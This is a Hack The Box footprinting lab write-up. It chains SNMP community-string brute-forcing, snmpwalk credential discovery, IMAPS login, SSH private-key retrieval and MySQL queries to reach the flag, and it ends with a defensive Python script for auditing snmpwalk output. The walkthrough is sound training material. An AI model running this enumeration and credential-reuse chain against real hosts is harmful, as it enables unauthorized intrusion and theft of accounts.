HTB Footprinting Lab (hard) write-up

thesw0rd

This is a concise writeup about hacking an HTB Machine, specifically a task from the footprinting lab at the end of the "Footprinting" module.

  • Initial Nmap Scan: An initial Nmap scan of the target 10.129.202.20 revealed several open ports:

      $ sudo nmap -sV 10.129.202.20
      $ sudo nmap -sV -sU 10.129.202.20
    

    Key Findings:

    • OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 on port 22.

    • Dovecot pop3d on ports 110 and 995.

    • Dovecot imapd on ports 143 and 993.

    • Port 161 was open for SNMP.

  • SNMP Community String Brute-Force: Trying a few scripts against IMAP and POP3 didn't help much. Then, using onesixtyone with a wordlist, the SNMP community string backup was discovered.

      $ onesixtyone -c wordlists/SecLists/Discovery/SNMP/snmp.txt 10.129.202.20
    

    Key Findings:

    • Community string backup found for 10.129.202.20.

    • System identified as Linux NIXHARD 5.4.0-90-generic.

  • SNMP Enumeration with snmp-check: With the backup community string, snmp-check was used to enumerate the system. This provided system information including the hostname (NIXHARD), description (Linux NIXHARD 5.4.0-90-generic) and contact (Admin tech@inlanefreight.htb).

      $ snmp-check -c backup 10.129.202.20
    

    Key Findings:

    • Hostname: NIXHARD.

    • Description: Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64.

    • Contact: Admin <tech@inlanefreight.htb>.

    • Location: Inlanefreight.

  • Getting MIB information with snmpwalk: Further enumeration with snmpwalk using the backup community string revealed more detailed information.

      $ snmpwalk -v2c -c backup 10.129.202.20
    

    Key Findings:

    • A string value tom NMds732Js2761 was found at iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80, which appeared to be a username and password pair.

    • A script /opt/tom-recovery.sh was referenced.

  • IMAPS Login: The discovered credentials tom:NMds732Js2761 were successfully used to log into the IMAPS service on 10.129.202.20.

      $ openssl s_client -connect 10.129.202.20:imaps
      ...<SNIP>...
      a login tom NMds732Js2761
      ...<SNIP>...
    

    Key Findings:

    • Successful login to IMAPS for user tom.

  • Retrieving SSH Private Key from Email: Inside the INBOX, an email with the subject "KEY" was found. The body of this email contained an SSH private key.


      ...<SNIP>...
      a2 LIST "" "*"
      * LIST (\HasNoChildren) "." Notes
      * LIST (\HasNoChildren) "." Meetings
      * LIST (\HasNoChildren \UnMarked) "." Important
      * LIST (\HasNoChildren) "." INBOX
      a3 SELECT INBOX
      ...<SNIP>...
      a4 FETCH 1 BODY[TEXT]
      ...<SSH KEY>...
    

    Key Findings:

    • Found an email in INBOX with Subject: KEY.

    • The email body contained a -----BEGIN OPENSSH PRIVATE KEY----- block.

  • SSH Access: The SSH private key was saved to a file named id_rsa, permissions were set to 600, and SSH access was gained to the NIXHARD machine as user tom.

      $ chmod 600 id_rsa
      $ ssh -i id_rsa tom@10.129.202.20 -v

  • Post-Login Enumeration and Flag Capture: After gaining SSH access, I navigated the file system. I checked tom's .bash_history and discovered commands related to MySQL.

      $ cat ~/.bash_history
    

    Key Findings from .bash_history:

    • mysql -u tom -p command was executed multiple times.

This led me to connect to MySQL as tom.

    $ mysql -u tom -p
    Enter password:
    show databases;
    use users;
    show tables;
    show columns from users;
    select * from users where username='HTB';

Key Findings from MySQL:

  • Listing databases using show databases; revealed a users database.

  • Selecting the users database (use users;) and listing tables (show tables;) showed a table also named users.

  • Examining the schema of the users table (show columns from users;) showed id, username, and password columns.

  • Querying the users table for a specific username HTB (select * from users where username='HTB';) revealed the password for HTB: cr3n4o7rzse7rzhnckhssncif7ds. This was the flag for the CTF.
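Returning to the snmpwalk step above: the OID suffix 6.66.65.67.75.85.80 on the line that leaked tom's credentials is a length-prefixed ASCII table index, and it decodes to the name BACKUP. The following Python is an added example, not code from the write-up or from HTB: it parses snmpwalk output, decodes that index, and flags string values shaped like a username/secret pair, the kind of check to run when auditing what your own SNMP agent exposes. The second OID and its value are taken from the write-up; the other sample lines and the regular expressions are constructed for this example.

```python
import re

# Constructed snmpwalk excerpt. The second line's OID and value are the ones
# quoted in the write-up; the other two lines are made up for this example.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom NMds732Js2761"
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
"""

# One snmpwalk line has the form "<oid> = <TYPE>: <value>".
LINE_RE = re.compile(r'^(?P<oid>[\w.]+) = (?P<type>[\w-]+): ?(?P<val>.*)$')
# A value shaped like "<username> <secret>", as seen in the lab.
CRED_RE = re.compile(r'^(?P<user>[a-z_][a-z0-9_-]*) (?P<secret>\S{8,})$')

def decode_string_index(oid):
    """Decode a length-prefixed ASCII table index at the tail of an OID.

    SNMP encodes a string index as <len>.<byte>.<byte>...; the suffix
    6.66.65.67.75.85.80 is therefore the 6-byte name "BACKUP".
    Returns the decoded name, or None if no such suffix is present.
    """
    parts = [int(p) for p in oid.split('.') if p.isdigit()]
    for i, length in enumerate(parts):
        rest = parts[i + 1:]
        if 0 < length == len(rest) and all(32 <= b < 127 for b in rest):
            return bytes(rest).decode('ascii')
    return None

def parse_walk(text):
    """Yield (oid, type, value) for each parseable line, quotes stripped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m['oid'], m['type'], m['val'].strip('"')

def find_exposed_credentials(text):
    """Return [(index_name, value)] for STRING values shaped like a
    username/secret pair, e.g. output of a script exposed over SNMP."""
    hits = []
    for oid, typ, val in parse_walk(text):
        if typ == 'STRING' and CRED_RE.match(val):
            hits.append((decode_string_index(oid), val))
    return hits

if __name__ == '__main__':
    for name, value in find_exposed_credentials(SAMPLE_WALK):
        print(f'possible credential in table entry {name!r}: {value}')
```

Feed it the saved output of `snmpwalk -v2c -c <community> <host>` to find the same class of leak on hosts you are responsible for.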
